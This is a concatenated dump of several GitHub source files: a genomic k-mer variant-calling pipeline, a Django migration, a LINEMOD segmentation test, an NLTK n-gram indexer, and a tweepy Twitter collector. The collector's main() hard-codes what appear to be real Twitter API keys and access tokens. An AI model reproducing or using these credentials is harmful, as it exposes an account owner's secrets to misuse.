            print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'shrink useful kmers from kmerpair')
            out=open('%s/contig_pair/usedkmers'%outdir,'w')
            for i in set(list(pair_T)+list(pair_N)):
                out.write(i+'\n')
            out.close()
            pool=Pool(2)
            pool.map(usedkmers, [kmerfile_T,kmerfile_N])
            pool.close()
            pool.join()
            OnlyKeepMaxRef()
            del pair_T_rv,spekmer,kmerpair_rv
    # Load per-sample k-mer counts and compute per-contig support/coverage.
    wildkmers=pd.read_csv('%s/contig_pair/usedkmers_%s'%(outdir,kmerfile_N.split('/')[-1].replace('.txt.gz','')),header=None,index_col=0,sep=' ')
    mutkmers=pd.read_csv('%s/contig_pair/usedkmers_%s'%(outdir,kmerfile_T.split('/')[-1].replace('.txt.gz','')),header=None,index_col=0,sep=' ')
    contig_all=pd.read_csv('%s/merged_contigs/contigs_allspkmers'%outdir,header=0,index_col=None,sep='\t')
    kmerpair=pd.read_csv('%s/contig_pair/kmerpair.csv'%outdir,header=None,index_col=0,sep='\t')
    contig_sp_cov=Cal_sp_cov(contig_all.contig)
    del wildkmers,mutkmers
    if os.path.exists('%s/contig_pair/contigs_pairedspkmers'%outdir) is False:
        print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'merging into paired contigs')
        os.system("echo 'tag\tpvalue' > %s/contig_pair/specific_kmer_fix"%outdir)
        subprocess.call(r"""awk '{print $1"\t0"}' %s/contig_pair/kmer_T >> %s/contig_pair/specific_kmer_fix"""%(outdir,outdir),shell=True)
        subprocess.call(r"./mergeTags -k 31 -m 25 -n %s/contig_pair/specific_kmer_fix 2>/dev/null|awk '{if($1>%s){print $0}}'|gzip -c > %s/contig_pair/contigs.gz;gunzip -c %s/contig_pair/contigs.gz |cut -f 2 > %s/contig_pair/contigs_pairedspkmers"%(outdir,nb_kmers,outdir,outdir,outdir),shell=True)
    # Split contigs into paired (supported on both strands) and unpaired.
    contig_all=contig_all[contig_all.contig.isin(contig_sp_cov.index)]
    contig_pair=pd.read_csv('%s/contig_pair/contigs_pairedspkmers'%outdir,header=0,index_col=None,sep='\t')
    contig_pair=contig_pair[contig_pair.contig.isin(contig_sp_cov.index)]
    contig_pair_plus_rv=contig_pair.contig.tolist()+[str(Seq(i).reverse_complement()) for i in contig_pair.contig.tolist()]
    pairidx=contig_all.contig.isin(contig_pair_plus_rv)#leave too many unpaired contigs to bbduk step
    contig_pair=contig_all[pairidx]
    contig_pair.contig.to_csv('%s/contig_pair/contigs_pairedspkmers'%outdir,header=True,index=False,sep='\t')
    contig_unpair=contig_all[-pairidx]
    print ('orignial contigs: %s;paired contigs: %s; unpaired contigs: %s'%(contig_all.shape[0],contig_pair.shape[0],contig_unpair.shape[0]))
    # Report the ten largest local objects (rough memory diagnostics).
    for name, size in sorted(((name, sys.getsizeof(value)) for name, value in locals().items()),key= lambda x: -x[1])[:10]:
        if size > 100000:print("{:>30}: {:>8}".format(name, sizeof_fmt(size)))
    ################## call variants from paired contigs #######################
    nb_contigs_eachthread=ceil(contig_pair.shape[0]/threads)
    if nb_contigs_eachthread>0 and os.path.exists('%s/variant_result/SNV_results_pair.txt'%outdir) is False:
        print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'all threads for %s contig_paired are started'%contig_pair.shape[0])
        subprocess.call("""rm %s/x*;split -l %s -d --additional-suffix=pair_%s %s/contig_pair/contigs_pairedspkmers;mv x*pair_%s %s"""%(outdir,nb_contigs_eachthread,samid,outdir,samid,outdir),shell=True,executable='/bin/bash')
        fileidxs=[i.strip() for i in os.popen('ls %s/x*pair_%s|grep -v unpair'%(outdir,samid)).readlines()]
        print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'%s chunks are undergoing analysis'%len(fileidxs))
        pool=Pool(min(len(fileidxs),threads))
        pool.starmap(ana_contigs, zip(fileidxs,[True]*len(fileidxs)))
        pool.close()
        pool.join()
        subprocess.call(r'''cat %s/contig_pair/result* > %s/variant_result/SNV_results_pair.txt;rm %s/contig_pair/result*'''%(outdir,outdir,outdir),shell=True)
        print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'all threads for contig_paired are finished')
    ################## call variants from unpaired contigs ########################
    try: nb_unpair=contig_unpair.shape[0]
    except: nb_unpair=0
    if nb_unpair>0 and os.path.exists('%s/variant_result/SNV_results_unpair.txt'%outdir) is False:
        contig_unpair.to_csv('%s/contig_unpair/contigs_unpaired.pass'%outdir,header=False,index=False,sep='\t')
        print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'all threads for %s contig_unpaired are started'%(contig_unpair.shape[0]))
        nb_contigs_eachthread=ceil(int(os.popen('wc -l %s/contig_unpair/contigs_unpaired.pass'%outdir).readline().strip().split()[0])/threads)
        subprocess.call("""rm x*passed_%s;split -l %s -d --additional-suffix=passed_%s %s/contig_unpair/contigs_unpaired.pass;mv x*passed_%s %s"""%(samid,nb_contigs_eachthread,samid,outdir,samid,outdir),shell=True,executable='/bin/bash')
        fileidxs=[i.strip() for i in os.popen('ls %s/x*passed_%s'%(outdir,samid)).readlines()]
        print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'%s chunks of contig_unpaired undergo filtering'%len(fileidxs))
        pool=Pool(min(len(fileidxs),threads))
        pool.map(filter_unpaired_contigs, fileidxs)
        pool.close()
        pool.join()
        os.system("cat %s/contig_unpair/passedcontig_* > %s/contig_unpair/passedcontig.fa;echo 'contig' > %s/contig_unpair/contigs_unpaired;cat %s/contig_unpair/contigs_unpaired_* >> %s/contig_unpair/contigs_unpaired;cat %s/contig_unpair/FailedToInferRef_* > %s/contig_unpair/FailedToInferRef.txt"%(outdir,outdir,outdir,outdir,outdir,outdir,outdir))
        if os.path.exists('%s/variant_result/SNV_results_unpair.txt'%outdir) is False:
            nb_contigs_eachthread=ceil(int(os.popen('wc -l %s/contig_unpair/contigs_unpaired'%outdir).readline().strip().split()[0])/threads)
            print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'%s/%s unpaired contigs are dumped to bbduk'%(int(os.popen('wc -l %s/contig_unpair/contigs_unpaired'%outdir).readline().strip().split()[0])-1,contig_unpair.shape[0]))
            #retriev reads from fastq
            os.system("bbduk.sh in=%s in2=%s ref=%s k=31 mm=f rcomp=t outm=%s fastawrap=500 rename=t hdist=%s speed=0 2>/dev/null"%(wild1,wild2,'%s/contig_unpair/passedcontig.fa'%outdir,'%s/contig_unpair/unpair_contigs_reads.fa'%outdir,distance))
            cor_reads='%s/contig_unpair/unpair_contigs_reads.fa'%outdir
            try:nb_weird_contig=int(os.popen('wc -l %s/contig_unpair/FailedToInferRef.txt'%outdir).readline().strip().split()[0])
            except:nb_weird_contig=0
            subprocess.call(r"""split -l %s -d --additional-suffix=unpair_%s %s/contig_unpair/contigs_unpaired;mv x*unpair_%s %s"""%(nb_contigs_eachthread,samid,outdir,samid,outdir),shell=True,executable='/bin/bash')
            fileidxs=[i.strip() for i in os.popen('ls %s/x*unpair_%s'%(outdir,samid)).readlines()]
            print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'%s chunks of contig_unpaired are started'%(len(fileidxs)))
            pool=Pool(min(len(fileidxs),threads))
            pool.starmap(ana_contigs, zip(fileidxs,[False]*len(fileidxs)))
            pool.close()
            pool.join()
            subprocess.call(r'''cat %s/contig_unpair/result* > %s/variant_result/SNV_results_unpair.txt;rm %s/contig_unpair/result* %s/contig_unpair/unpair_contigs_reads.fa'''%(outdir,outdir,outdir,outdir),shell=True)
            print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'all threads for contig_unpaired are finished')
    ##################### prepare final results ###################
    print (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),'prepare the final result')
    subprocess.call(r'''cat %s/variant_result/SNV_results_* > %s/variant_result/SNV_results.txt;rm %s/x* %s/contig_unpair/*_tmp*'''%(outdir,outdir,outdir,outdir),shell=True)
    result=pd.read_csv('%s/variant_result/SNV_results.txt'%outdir,header=None,index_col=None,sep='\t')
    result.columns=['contig','putative_ref','sp_case','cov_case','sp_control','cov_control']
    # Final filter: enough support/coverage in the case, enough coverage in
    # the control, and either strong absolute support or a high allele ratio.
    result=result[(result.sp_case>=support)&(result.cov_case>=lowdepth)&(result.cov_control>=lowdepth)&((result.sp_case>10)|(result.sp_case/result.cov_case>cutoff))&(-result.putative_ref.isna())].drop_duplicates()
    result=result.sort_values(['sp_case'],ascending=False)
    result.to_csv('%s/variant_result/SNV_report.txt'%outdir,header=True,index=False,sep='\t')
    with open('%s/variant_result/SNV_report.txt'%outdir)as f:
        snv=list(map(lambda x:x.strip().split(),f))
    RemoveFP_via_control([i[0] for i in snv[1:]])
    # Align each contig against its putative reference and write the
    # human-readable alignment report.
    align=open('%s/variant_result/SNV_alignments.txt'%outdir,'w')
    for line in tqdm(snv[1:]):
        alignments=pairwise2.align.localms(line[0],line[1],5, -2.5, -8, -.4)
        try:
            #if len(alignments[0][0])<31:continue#the mutant contig is very different to the refseq and alignment failed
            align.write(format_alignment(*alignments[0]).rstrip()+'\t'+str(line[-4])+'\t'+str(line[-3])+'\t'+str(line[-2])+'\t'+str(line[-1])+'\n')
        except:
            print (line,alignments,'align failed')
    align.close()
| [
"noreply@github.com"
] | noreply@github.com |
159e62cf42f265a5d96156ae23363dbeced3b8c0 | 1e53216c58f3c7843031721305590b83dbaed3f2 | /week_four/db_demo/db_app/migrations/0003_message_post_user_who_liked.py | 59fc1606c04688bdf72a3cafe91a74cffc27e608 | [] | no_license | MTaylorfullStack/python_july_20 | 991852ba12d6f06d6b93b8efc60b66ee311b5cb3 | bdfb0d9a74300f2d6743ac2d108571692ca43ad9 | refs/heads/master | 2022-12-12T18:03:00.886048 | 2020-08-27T23:53:31 | 2020-08-27T23:53:31 | 277,956,745 | 2 | 2 | null | 2023-06-30T20:06:11 | 2020-07-08T01:09:34 | Python | UTF-8 | Python | false | false | 425 | py | # Generated by Django 2.2 on 2020-07-29 00:53
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the many-to-many 'user_who_liked' relation on message_post,
    linking posts to the db_app.User rows that liked them."""
    dependencies = [
        ('db_app', '0002_message_post'),
    ]
    operations = [
        migrations.AddField(
            model_name='message_post',
            name='user_who_liked',
            field=models.ManyToManyField(related_name='liked_post', to='db_app.User'),
        ),
    ]
| [
"mtaylor@codingdojo.com"
] | mtaylor@codingdojo.com |
dd6d4db1190524c0a26a2fdc412d00bdd2e2dcf3 | 5e5e74ee44a90d2103b312fb75f47b62dcaebc2e | /code/segmentation/test_linemod_rgbd.py | cd26cc1bdb166319278c9af5facfd840dfa0a7be | [] | no_license | cmitash/multi-instance-pose-estimation | df98835f60208a5055cef035d6a998e332adc377 | 3fa26634d0c34419e93c52b91e121d4d410d64d1 | refs/heads/master | 2021-07-04T00:38:04.170108 | 2021-02-22T01:30:05 | 2021-02-22T01:30:05 | 217,936,365 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,185 | py | import os
from options.test_options import TestOptions
from data import CreateDataLoader
from models import create_model
from util.visualizer import save_images
from util import html
import numpy as np
import torchvision.transforms as transforms
from PIL import Image
import torch
import cv2
# Network class index -> Occlusion-LINEMOD object identifier; index 0 is the
# background class.
object_classes = {0: 'background', 1: 'obj_01', 2: 'obj_02', 3: 'obj_05',
                  4: 'obj_06', 5: 'obj_08', 6: 'obj_09', 7: 'obj_10',
                  8: 'obj_11', 9: 'obj_12'}
test_scenes = [3, 8, 17, 27, 36, 38, 39, 41, 47, 58, 61, 62, 64, 65, 69, 72, 79, 89, 96, 97, 102, 107, 110, 115, 119, 124, 126, 136, 153, 156, 162, 166, 175, 176, 178, 203, 207, 217, 219, 221, 224, 243, 248, 249, 254, 258, 263, 266, 268, 277, 283, 307, 310, 322, 326, 338, 342, 356, 362, 365, 368, 387, 389, 402, 415, 417, 425, 428, 434, 435, 438, 442, 446, 453, 473, 474, 476, 477, 480, 491, 494, 499, 501, 503, 521, 527, 529, 532, 535, 540, 543, 549, 560, 563, 571, 575, 589, 603, 607, 611, 615, 625, 642, 648, 649, 650, 652, 667, 669, 679, 691, 695, 703, 708, 711, 727, 736, 737, 739, 740, 750, 754, 756, 757, 758, 761, 762, 764, 768, 769, 770, 773, 775, 785, 788, 791, 794, 801, 803, 804, 808, 809, 819, 821, 828, 837, 840, 844, 850, 856, 867, 871, 877, 883, 886, 894, 902, 903, 904, 907, 909, 918, 925, 934, 942, 952, 956, 961, 968, 969, 972, 982, 984, 991, 1001, 1012, 1038, 1050, 1057, 1061, 1069, 1071, 1087, 1098, 1099, 1103, 1107, 1117, 1123, 1131, 1144, 1148, 1151, 1157, 1168, 1169, 1176, 1180, 1199, 1212]
# Root directory holding one sub-folder per scene (each with rgb.png + depth.png).
test_path = 'datasets/occ_linemod/'
if __name__ == '__main__':
    opt = TestOptions().parse()
    opt.nThreads = 1   # test code only supports nThreads = 1
    opt.batchSize = 1  # test code only supports batchSize = 1
    opt.serial_batches = True  # no shuffle
    opt.no_flip = True  # no flip
    opt.display_id = -1  # no visdom display
    model = create_model(opt)
    model.setup(opt)
    # Run inference on every test scene: load RGB + depth, normalize the
    # depth into an 8-bit channel, stack to RGBD, and feed to the model.
    for testcase in test_scenes:
        scene_folder = os.path.join(test_path, '%04d' % int(testcase))
        test_rgb_image = os.path.join(scene_folder, 'rgb.png')
        test_depth_image = os.path.join(scene_folder, 'depth.png')
        A_img_depth = cv2.imread(test_depth_image, cv2.IMREAD_UNCHANGED)
        # Depth is stored in millimetres; convert to metres and clamp at 2 m.
        A_img_depth = A_img_depth.astype(np.float32)
        A_img_depth = A_img_depth/1000.0
        A_img_depth[A_img_depth > 2] = 0
        # Min-max normalize the non-zero depth values into [0, 255].
        max_val = np.amax(A_img_depth[np.nonzero(A_img_depth)])
        min_val = np.amin(A_img_depth[np.nonzero(A_img_depth)])
        A_img_depth = (A_img_depth - min_val)*255.0/(max_val - min_val)
        A_img_depth[A_img_depth < 0] = 0
        A_img_depth = A_img_depth.astype(np.uint8)
        A_img_depth = np.expand_dims(A_img_depth, axis=2)
        A_img_rgb = Image.open(test_rgb_image).convert('RGB')
        A_img_rgb = np.array(A_img_rgb, dtype=np.uint8)
        # 4-channel RGBD input, scaled to [-1, 1] per channel.
        A = np.concatenate((A_img_rgb, A_img_depth), axis=2)
        A = transforms.ToTensor()(A)
        A = transforms.Normalize((0.5, 0.5, 0.5, 0.5), (0.5, 0.5, 0.5, 0.5))(A)
        A = A.unsqueeze(0)
        data = {'A': A, 'A_paths': scene_folder, 'object_classes': object_classes}
        model.set_input(data)
        model.test()
        print (test_rgb_image)
| [
"cmitash@Chaitanyas-MacBook-Pro.local"
] | cmitash@Chaitanyas-MacBook-Pro.local |
7ccba16fed70bdaf5f8693bbb478d49e5edd403b | f86e92e4287fd26d04f642b12269b893aa9c1c47 | /Indexer/Indexer/indexerVersion2NLTK.py | b2ad82f7a576c1434da1b6124a03dec57497641f | [] | no_license | mishraMe/InformationRetrival | b22ceea5f9c345616a20fb8fb792c78ecd59c652 | ba6f573ff6dac16a3aa97df92686d2ec7b41dc23 | refs/heads/master | 2021-01-11T14:56:41.911516 | 2017-03-15T07:01:03 | 2017-03-15T07:01:03 | 80,258,170 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,963 | py |
# This program creates an inverted index for an
#input corups
from nltk import word_tokenize
from nltk.util import ngrams
import os
import operator
from collections import OrderedDict
# Directory of pre-cleaned documents; every file in it is indexed.
corpus_dir = "cleaned_content_dir/"
default_corpus = os.listdir(corpus_dir)
# NOTE(review): appears unused anywhere in this module — candidate for removal.
doc_token_count_dic = {}
def create_index(corpus, n_gram_val):
    """Tokenize every document in `corpus` and build frequency tables.

    Each file name in `corpus` is read from `corpus_dir`; for n_gram_val == 1
    the raw tokens are kept, otherwise the tokens are converted to
    n_gram_val-grams (generalized from the original hard-coded 2/3 branches,
    which behaved identically). The resulting doc -> tokens mapping is handed
    to create_word_dic, which writes the term/document frequency tables.
    """
    doc_token_dic = {}
    for doc in corpus:
        # `with` guarantees the file handle is closed even if tokenization
        # raises (the original leaked the handle on error).
        with open(corpus_dir + doc, 'r') as doc_file:
            doc_data = doc_file.read()
        tokens = word_tokenize(doc_data)
        if n_gram_val == 1:
            doc_token_dic[doc] = tokens
        else:
            doc_token_dic[doc] = ngrams(tokens, n_gram_val)
    create_word_dic(doc_token_dic, n_gram_val)
def create_word_dic(doc_token_dic, n_gram_value):
    """Build the inverted index (token -> {doc: count}) from per-document
    token streams, then emit both frequency tables for this n-gram size."""
    word_dic = {}
    for doc_id, tokens in doc_token_dic.items():
        for token in tokens:
            per_doc = word_dic.setdefault(token, {})
            per_doc[doc_id] = per_doc.get(doc_id, 0) + 1
    create_term_freq_table(word_dic, n_gram_value)
    create_doc_freq_table(word_dic, n_gram_value)
def create_term_freq_table(word_dic, n_gram_val):
    """Write each term with its corpus-wide frequency, most frequent first.

    word_dic maps term -> {doc: count}; a term's frequency is the sum of its
    per-document counts. Output goes to
    corpus_dir/term_freq_table_for_<n>_ngrams. Returns 0 (kept for
    compatibility with the original interface).
    """
    term_freq = {}
    file_name = open(corpus_dir + "term_freq_table_for_"
                     + str(n_gram_val) + "_ngrams", "w+")
    for word in word_dic:
        # Bug fix: the original accumulated into a single `doc_val` that was
        # never reset between words, so each term's reported frequency
        # included the counts of every previously processed term.
        term_freq[word] = sum(word_dic[word].values())
    # Sort by frequency, then term, descending.
    sorted_dict = list(sorted(term_freq.items(), key=lambda i: (i[1], i[0]), reverse=True))
    for each in sorted_dict:
        file_name.writelines("term -> " + str(each[0])
                             + ", freq -> " + str(each[1]) + '\n')
    file_name.close()
    return 0
def create_doc_freq_table(word_dic, n_grams):
    """Write one line per term listing the documents containing it and its
    document frequency (number of distinct documents), sorted by term.

    Output goes to a table file under ``corpus_dir``.  Note: str(docs.keys())
    prints the dict_keys wrapper verbatim, and ",b doc_frequency" looks like
    a typo kept for output compatibility.  Returns 0.
    """
    file_name = open(corpus_dir + "document_frequency_table_for_"
                     + str(n_grams) + "_ngrams", "w+")
    word_dic = OrderedDict(sorted(word_dic.items()))
    for word in word_dic:
        docs = word_dic[word]
        doc_total = len(docs)
        file_name.writelines("word -> " + str(word) + ", docs -> "
                             + str(docs.keys()) + ",b doc_frequency "
                             + str(doc_total) + '\n')
    file_name.close()
    return 0
#verifcation code prints the total count of term reference in the document
# for word in word_dic:
# if word == ('in', 'solar'):
# print word_dic[word]
# else:
# continue
def main():
    """Build term- and document-frequency tables for 1-, 2- and 3-grams."""
    # BUG FIX: the loop previously read ``while n_gram_limit is not 4`` --
    # identity comparison between ints is implementation-dependent and
    # raises a SyntaxWarning on modern CPython.  An explicit range is both
    # correct and clearer.
    for n_gram_limit in range(1, 4):
        create_index(default_corpus, n_gram_limit)
main()
| [
"mishraMe@husky.neu.edu"
] | mishraMe@husky.neu.edu |
c2725df0039eb171eae7a52b370b9bd27307605c | 888bad8f10370836d804ef0d7867872c8752149e | /collect_data.py | 308bf29ee6837d0ba4e92ac89da720120f98a39e | [] | no_license | wanyanxie/twitter_analysis | 9f8226201ef47aec3476788a4b9874369c30435c | 48aec5ad2f464722236203c09b40a41bb98ff727 | refs/heads/master | 2021-01-10T01:37:08.352370 | 2015-10-18T23:05:54 | 2015-10-18T23:05:54 | 44,427,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,396 | py | __author__ = 'wanyanxie'
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
import re
import sys
import json
import dateutil.parser
from pytz import timezone
import pytz
import tweepy
import time
import urllib3
import random
import csv
import os
#Listener Class Override
class listener(StreamListener):
    """tweepy StreamListener that collects tweets for a fixed time window.

    Every accepted tweet's raw JSON is appended to an hourly file under
    ./data/, and geo-tagged tweets are additionally appended as CSV rows to
    ./data/data_geo.txt.  Written in Python 2 syntax (print statements,
    dict.has_key, ``except X, e``).
    """
    def __init__(self, start_time, time_limit):
        # start_time: epoch seconds when collection began.
        # time_limit: how long (seconds) to keep collecting before exiting.
        self.time = start_time
        self.limit = time_limit
        # Last tweet id seen; used to drop consecutive duplicate deliveries.
        self.lastID = None
        #self.regex = re.compile('|'.join(keywords).lower())
    def on_data(self, data):
        # The ``while`` effectively acts as an ``if``: every path inside
        # returns, so at most one iteration runs.  Once the time limit has
        # passed, control falls through to exit() and kills the process.
        # print time.time() - self.time
        while (time.time() - self.time) < self.limit:
            try:
                tweet = json.loads(data)
                if not tweet.has_key('id_str'):
                    #print 'No tweet ID - ignoring tweet.'
                    return True
                #### ignore duplicates tweets
                tweetID = tweet['id_str']
                if tweetID != self.lastID:
                    self.lastID = tweet['id_str']
                else:
                    return True
                if not tweet.has_key('user'):
                    #print 'No user data - ignoring tweet.'
                    return True
                user = tweet['user']['name']
                text = parse_text(tweet['text'])
                print text
                # print user, text
                ### mathces the key words
                # matches = re.search(self.regex, text.lower())
                # if not matches:
                #     return True
                #### remove the retweets
                # if tweet['retweeted'] or 'RT @' in tweet['text']:
                #     return True
                # NOTE(review): location/source are extracted but never used.
                location = tweet['user']['location']
                source = tweet['source']
                # Convert the tweet timestamp to US/Pacific for file naming.
                d = dateutil.parser.parse(tweet['created_at'])
                d_tz = pytz.timezone('UTC').normalize(d)
                localtime = d.astimezone(timezone('US/Pacific'))
                tmstr = localtime.strftime("%Y%m%d-%H:%M:%S")
                #print tweetID, text
                # saveFile = open('raw_tweets.json', 'a')
                # saveFile.write(data)
                # saveFile.write('\n')
                # saveFile.close()
                # append the hourly tweet file
                with open('./data/tweets-%s.data' % tmstr.split(':')[0], 'a+') as f:
                    f.write(data)
                # Only exact-point geo tweets continue to the CSV output.
                geo = tweet['geo']
                if geo and geo['type'] == 'Point':
                    coords = geo['coordinates']
                else:
                    return True
                #
                with open('./data/data_geo.txt', 'a+') as f:
                    #f.write('tweetID,creat_time,Coord1,Coord2,Text')
                    print("%s,%s,%f,%f,%s" % (tweetID,tmstr,coords[0],coords[1],text))
                    f.write("%s,%s,%f,%f,%s\n" % (tweetID,tmstr,coords[0],coords[1],text))
            # NOTE(review): the second except clause is unreachable --
            # BaseException already catches ReadTimeoutError.
            except BaseException, e:
                print 'failed ondata,', str(e)
                time.sleep(5)
                pass
            except urllib3.exceptions.ReadTimeoutError, e:
                print 'failed connection,', str(e)
                time.sleep(5)
                pass
        exit()
    def on_error(self, status):
        # Called by tweepy with the HTTP status code on stream errors.
        print "error_message:", status
def parse_text(text):
    """
    Encode *text* as Latin-1, silently dropping characters that cannot be
    represented, and replace newlines with spaces so the result fits on one
    CSV line.  (The previous docstring claimed number/punctuation removal
    and lower-casing, which this function does not do.)
    """
    text = text.encode('latin1', errors='ignore')
    #text = text.rstrip('\n')
    text = text.replace('\n', ' ')
    return text
def read_csv(file):
    """Read *file* and return its lines, stripped of surrounding newlines
    and lower-cased, one list entry per line."""
    with open(file) as handle:
        return [line.strip('\n').lower() for line in handle]
def OAuth(consumer_key, consumer_secret, access_token, access_secret):
    """Build a tweepy OAuthHandler from the given credentials and return it.

    Also prints the authorization URL and the authenticated account's name
    as a connectivity sanity check.  Python 2 print syntax.
    """
    auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_secret)
    try:
        redirect_url = auth.get_authorization_url()
        print redirect_url
    except tweepy.TweepError:
        print 'Error! Failed to get request token.'
    # Verify the credentials actually work by fetching our own profile.
    api = tweepy.API(auth)
    print api.me().name
    return auth
def main():
    """Start a filtered Twitter stream tracking keywords from candidates.txt."""
    # SECURITY: hard-coded Twitter API credentials committed to source.
    # These should be revoked and loaded from environment variables or a
    # config file kept out of version control.
    consumer_key = '7z0EH9KkaJOrMzzByX1KvZasd'
    consumer_secret = 'AQ6wVGxj4sOLZJvtrIk7spX4STYyYoxYSSHVk81saoSWEQtjqB'
    access_token = '1705070078-VqlcsHdn7Rz1RrXpB4ACn249g05NwgMI1fixNc8'
    access_secret = '6qaVRAmCnVuJPcPJrxA0RlpmkCcGE6pJHq2HgdsJ1FWIo'
    auth = OAuth(consumer_key, consumer_secret, access_token, access_secret)
    start_time = time.time() #grabs the system time
    time_limit = 10000
    keywords = read_csv('candidates.txt')
    print keywords
    #keywords = ["happy", "sad"]
    # print '|'.join(keywords).lower()
    # keyword_list = random.sample(keywords, 300) #track list
    #keyword_list = [keywords[i] for i in range(400)]
    #print keyword_list
    #keywords = ['traffic, accident, disabled vehicle, warning, emergency']
    # Ensure the output directory exists before the listener writes to it.
    dir = 'data'
    if not os.path.exists(dir):
        os.makedirs(dir)
    twitterStream = Stream(auth, listener(start_time, time_limit))
    twitterStream.filter(track = keywords, languages=['en'])
if __name__ == '__main__':
    main()
| [
"wanyanxie@gmail.com"
] | wanyanxie@gmail.com |
d6745bc1f0243c9c44de5992f1fda4a08325c905 | 17579f0f218f97e44b3dc279bc8db65e7ed841a2 | /venv/Scripts/sample-script.py | 7763e8147b45fb9979aa6d85da5a3301e6d50b02 | [] | no_license | sebidelamata/trumpVolatility | 680a821b7ddab054d5705a993bca04ca995984e1 | d405a626f0410751efae1f18d2da0dd16d96e2a5 | refs/heads/master | 2023-02-27T11:36:49.970811 | 2021-02-06T20:36:50 | 2021-02-06T20:36:50 | 296,694,320 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,000 | py | #!c:\users\sebid\trumpvolatility\venv\scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'yfinance==0.1.55','console_scripts','sample'
# NOTE: auto-generated setuptools console-script wrapper for the `sample`
# entry point of yfinance 0.1.55 -- do not edit by hand.
import re
import sys
# for compatibility with easy_install; see #2198
__requires__ = 'yfinance==0.1.55'
# Prefer stdlib importlib.metadata, then the importlib_metadata backport,
# and finally fall back to legacy pkg_resources.
try:
    from importlib.metadata import distribution
except ImportError:
    try:
        from importlib_metadata import distribution
    except ImportError:
        from pkg_resources import load_entry_point
def importlib_load_entry_point(spec, group, name):
    """Resolve and load entry point *name* of *group* from *spec* ('dist==ver')."""
    dist_name, _, _ = spec.partition('==')
    matches = (
        entry_point
        for entry_point in distribution(dist_name).entry_points
        if entry_point.group == group and entry_point.name == name
    )
    return next(matches).load()
# Only takes effect when pkg_resources' load_entry_point was not imported above.
globals().setdefault('load_entry_point', importlib_load_entry_point)
if __name__ == '__main__':
    # Strip the "-script.py"/".exe" suffix so argv[0] matches the command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(load_entry_point('yfinance==0.1.55', 'console_scripts', 'sample')())
| [
"delamatas@appstate.edu"
] | delamatas@appstate.edu |
b0f2fc3373b95a324d62f27a91b3d3751849e3f5 | 1d8cb12741d6b91fcb0a504bd4c3ec64a2bbe1f3 | /venv/bin/easy_install-3.7 | efbef1cc02bb85af667b3efaf94a99dd99838909 | [] | no_license | yvkschaefer/python_noteapp | fc2fdfded9214d4fec802f9e16590a7e0c3cec51 | 764a67ff249358353de38ade59d6fb6b527731d3 | refs/heads/master | 2020-03-24T12:13:55.464306 | 2018-07-29T23:01:17 | 2018-07-29T23:01:17 | 142,708,080 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | 7 | #!/Users/kschaefer/Documents/code/python/noteapp/venv/bin/python3
# -*- coding: utf-8 -*-
# NOTE: auto-generated setuptools wrapper for the easy_install command --
# do not edit by hand.
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # Normalize argv[0] (drop "-script.py"/".exe") before delegating to
    # setuptools' easy_install entry point.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"yvkschaefer@gmail.com"
] | yvkschaefer@gmail.com |
8091533695375b2f5eb6cba07fab911661f8d013 | 1cb515d0742759441cfeed931d0a106a7387a447 | /migrations/0002_auto_20141209_1820.py | a947da605f470f19a9aae24d2d63d4e292db9b24 | [] | no_license | oscfr657/shortener | dbe2e26682c4ff9f008cdd57f8edbe8598a02bcb | 4b8ad2d41b39aac885eff20ea8c0115cc6ac3b97 | refs/heads/master | 2021-01-19T13:01:19.054791 | 2014-12-29T18:32:44 | 2014-12-29T18:32:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Relax ``shorturl.url`` (nullable/blank but still unique) and enforce
    uniqueness on ``shorturl.word``.  Auto-generated; do not edit by hand."""
    dependencies = [
        ('urlshortener', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='shorturl',
            name='url',
            field=models.URLField(max_length=256, unique=True, null=True, blank=True),
            preserve_default=True,
        ),
        migrations.AlterField(
            model_name='shorturl',
            name='word',
            field=models.CharField(unique=True, max_length=64),
            preserve_default=True,
        ),
    ]
| [
"oscfr657@gmail.com"
] | oscfr657@gmail.com |
92d98e90faf1053ca2441ede6fdf9f7c3f4bf716 | d3d4cf92a5fc67a2e2e334896621217cb9015452 | /monai/networks/blocks/aspp.py | 5fbe6a89064d25f86fc743223e996b47b598cac0 | [
"Apache-2.0"
] | permissive | yaritzabg/MONAI | fe6271a274c2906e8cc5573ab00821dd4a30b330 | 18c33981e600d5704b1f8d208186c254e30dd3df | refs/heads/master | 2022-11-10T23:45:38.038630 | 2020-07-02T17:52:14 | 2020-07-02T17:52:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,593 | py | # Copyright 2020 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
